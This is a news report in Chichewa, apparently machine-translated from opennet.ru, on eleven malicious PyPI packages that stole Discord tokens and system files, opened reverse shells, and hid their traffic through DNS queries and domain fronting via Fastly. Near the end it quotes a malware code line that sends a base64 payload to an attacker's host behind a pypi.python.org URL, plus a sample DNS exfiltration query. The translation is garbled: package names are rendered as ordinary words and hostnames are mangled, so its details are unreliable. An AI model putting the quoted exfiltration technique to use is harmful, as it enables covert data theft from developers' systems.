M'ndandanda wa PyPI (Python Package Index), mapepala a 11 omwe ali ndi code yoyipa adadziwika. Mavuto asanadziwike, mapaketiwo adatsitsidwa nthawi pafupifupi 38. Maphukusi oyipa omwe apezeka ndi odziwika chifukwa chogwiritsa ntchito njira zotsogola kubisa njira zolumikizirana ndi ma seva owukira.
- importantpackage (zotsitsa 6305), phukusi lofunikira (12897) - adakhazikitsa kulumikizana ndi seva yakunja monyengerera kuti alumikizane ndi pypi.python.org kuti apereke mwayi wofikira ku dongosolo (reverse shell) ndikugwiritsa ntchito pulogalamu ya trevorc2 kubisa njira yolumikizirana.
- pptest (10001), ipboards (946) - adagwiritsa ntchito DNS ngati njira yolumikizirana kuti atumize zidziwitso za dongosololi (mu paketi yoyamba dzina la omvera, chikwatu chogwirira ntchito, IP mkati ndi kunja, chachiwiri - dzina la wogwiritsa ndi dzina la wolandila) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - adazindikira chizindikiro cha Discord m'dongosolo ndikuchitumiza kwa wolandira wakunja.
- trrfab (287) - adatumiza chizindikiritso, dzina la wolandila ndi zomwe zili mu /etc/passwd, /etc/hosts,/home kwa wolandila wakunja.
- 10Cent10 (490) - idakhazikitsa cholumikizira cham'mbuyo ndi wolandila wakunja.
- yandex-yt (4183) - adawonetsa uthenga wokhudza dongosololi lomwe likusokonezedwa ndikutumizidwa kutsamba lomwe lili ndi zina zowonjezera zomwe zaperekedwa kudzera nda.ya.ru (api.ya.cc).
Chodziwikiratu ndi njira yopezera makamu akunja omwe amagwiritsidwa ntchito pazofunikira komanso phukusi lofunikira, lomwe lidagwiritsa ntchito netiweki ya Fastly yoperekera zomwe zimagwiritsidwa ntchito mu bukhu la PyPI kubisa zomwe akuchita. M'malo mwake, zopempha zidatumizidwa ku seva ya pypi.python.org (kuphatikiza kutchula dzina python.org mu SNI mkati mwa pempho la HTTPS), koma mutu wa HTTP "Host" udaphatikiza dzina la seva yomwe imayendetsedwa ndi omwe akuwukira (sec. patsogolo.io. global.prod.fastly.net). Netiweki yotumizira zinthu idatumiza pempho lofananalo kwa seva yowukira, pogwiritsa ntchito magawo a kulumikizana kwa TLS kupita ku pypi.python.org potumiza deta.
Zomangamanga za PyPI zimayendetsedwa ndi netiweki yotumizira zinthu mwachangu, yomwe imagwiritsa ntchito projekiti yowonekera ya Varnish kuti isungire zopempha zanthawi zonse, komanso imagwiritsa ntchito kukonza satifiketi ya TLS pamlingo wa CDN, osati kumapeto kwa ma seva, kutumiza zopempha za HTTPS kudzera pa proxy. Mosasamala kanthu za omwe akumufuna, zopempha zimatumizidwa kwa woyimira, zomwe zimatsimikizira wolandirayo pogwiritsa ntchito mutu wa HTTP "Host", ndipo mayina amtundu wa omwe akulandirawo amamangiriridwa ku ma CDN load balancer IP maadiresi omwe ali ofanana ndi makasitomala onse a Fastly.
Seva ya owukirayo imalembetsanso ndi CDN Mofulumira, yomwe imapereka mapulani aulere kwa aliyense komanso imalola kulembetsa mosadziwika. Ndizofunikira kudziwa kuti kutumiza zopempha kwa wozunzidwayo popanga "chipolopolo chosinthika", chiwembu chimagwiritsidwanso ntchito, koma chimayambitsidwa kuchokera kumbali ya wowukirayo. Kuchokera kunja, kuyanjana ndi seva ya owukira kumawoneka ngati gawo lovomerezeka ndi chikwatu cha PyPI, chosungidwa pogwiritsa ntchito satifiketi ya PyPI TLS. Njira yofananira, yomwe imadziwika kuti "domain fronting," idagwiritsidwa ntchito kale kubisa dzina la wolandilayo podutsa kutsekereza, pogwiritsa ntchito kuthekera komwe kumaperekedwa mumanetiweki ena a CDN kuti mupeze HTTPS powonetsa munthu wabodza mu SNI ndikutumiza dzina la adapempha wolandila pamutu wa HTTP Host mkati mwa gawo la TLS.
Kubisa zinthu zoyipa, phukusi la TrevorC2 lidagwiritsidwanso ntchito kuti azitha kulumikizana ndi seva monga momwe amayendera pafupipafupi pa intaneti, mwachitsanzo, zopempha zoyipa zidatumizidwa mongofuna kutsitsa chithunzichi "https://pypi.python.org/images/ guid=β yokhala ndi zidziwitso zomwe zili mu guiid parameter. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})
Phukusi la pptest ndi ipboards linagwiritsa ntchito njira yosiyana yobisala zochitika zapaintaneti, kutengera encoding mfundo zothandiza pamafunso ku seva ya DNS. Pulogalamu yaumbanda imatumiza zidziwitso pochita zopempha za DNS monga "nu4timjagq4fimbuhe.example.com", momwe data yotumizidwa ku seva yowongolera imasungidwa pogwiritsa ntchito mtundu wa base64 mu dzina la subdomain. Wowukirayo amalandira mauthengawa poyang'anira seva ya DNS ya domain ya example.com.
Source: opennet.ru